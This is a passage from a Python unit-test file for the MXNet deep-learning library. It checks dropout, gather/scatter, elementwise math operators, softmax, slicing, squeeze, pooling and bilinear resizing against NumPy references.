x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
check_dropout_ratio(0.5, shape, cudnn_off=False)
check_dropout_ratio(0.0, shape, cudnn_off=False)
check_dropout_ratio(1.0, shape, cudnn_off=False)
check_dropout_ratio(0.75, shape, cudnn_off=False)
check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
check_passthrough(0.5, shape, cudnn_off=False)
check_passthrough(0.0, shape, cudnn_off=False)
check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
@with_seed()
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@with_seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
@with_seed()
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@with_seed()
def test_softmax():
check_softmax_with_shape((3, 4), default_context(), preserve_shape=False)
check_softmax_with_shape((3, 4), default_context(), preserve_shape=True)
check_softmax_with_shape((3, 4, 2), default_context(), preserve_shape=True)
check_softmax_grad(default_context())
check_smoothed_softmax_grad(default_context())
@with_seed()
def test_softmax_output_normalization():
def _softmaxoutput_normalization(multi_output, use_ignore, normalization):
grad_scale = np.random.random()
batch_size = 8
num_labels = 6
H, W = 3, 3
ignore_label = np.random.randint(0, num_labels) if use_ignore else -1
if multi_output:
data_shape = (batch_size, num_labels, H, W)
label_shape = (batch_size, H, W)
else:
data_shape = (batch_size, num_labels)
label_shape = (batch_size, )
data = mx.nd.random.uniform(-1, 1, shape=data_shape)
label = mx.nd.random.randint(
0, num_labels, shape=label_shape).astype('float32')
data.attach_grad()
kwargs = dict(grad_scale=grad_scale,
normalization=normalization, multi_output=multi_output)
if use_ignore:
kwargs.update(use_ignore=True, ignore_label=ignore_label)
with mx.autograd.record():
out = mx.nd.SoftmaxOutput(data=data, label=label, **kwargs)
out.backward(mx.nd.ones_like(data))
exp_data = mx.nd.exp(data)
softmax_data = exp_data / exp_data.sum(1, keepdims=True)
argmax_data = mx.nd.argmax(data, axis=1)
assert_almost_equal(out.asnumpy(), softmax_data.asnumpy())
one_hot_label = mx.nd.one_hot(label, num_labels)
if multi_output:
one_hot_label = one_hot_label.transpose((0, 3, 1, 2))
data_grad = softmax_data - one_hot_label
if use_ignore:
if multi_output:
data_grad *= (label !=
ignore_label).reshape((batch_size, 1, H, W))
else:
data_grad *= (label != ignore_label).reshape((batch_size, 1))
valid_cnt = 1
if normalization == 'batch':
valid_cnt = batch_size
elif normalization == 'valid':
valid_cnt = mx.nd.maximum(1, (label != ignore_label).sum())
scale = grad_scale / valid_cnt
if multi_output:
if normalization != 'valid':
scale /= H * W
data_grad *= scale
assert_almost_equal(data.grad.asnumpy(), data_grad.asnumpy())
for multi_output in [False, True]:
for use_ignore in [False, True]:
for normalization in ['null', 'batch', 'valid']:
_softmaxoutput_normalization(
multi_output, use_ignore, normalization)
@with_seed()
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
@with_seed()
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@with_seed()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
assert_raises(MXNetError, min)
assert_raises(MXNetError, max)
@with_seed()
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@with_seed()
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
@with_seed()
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
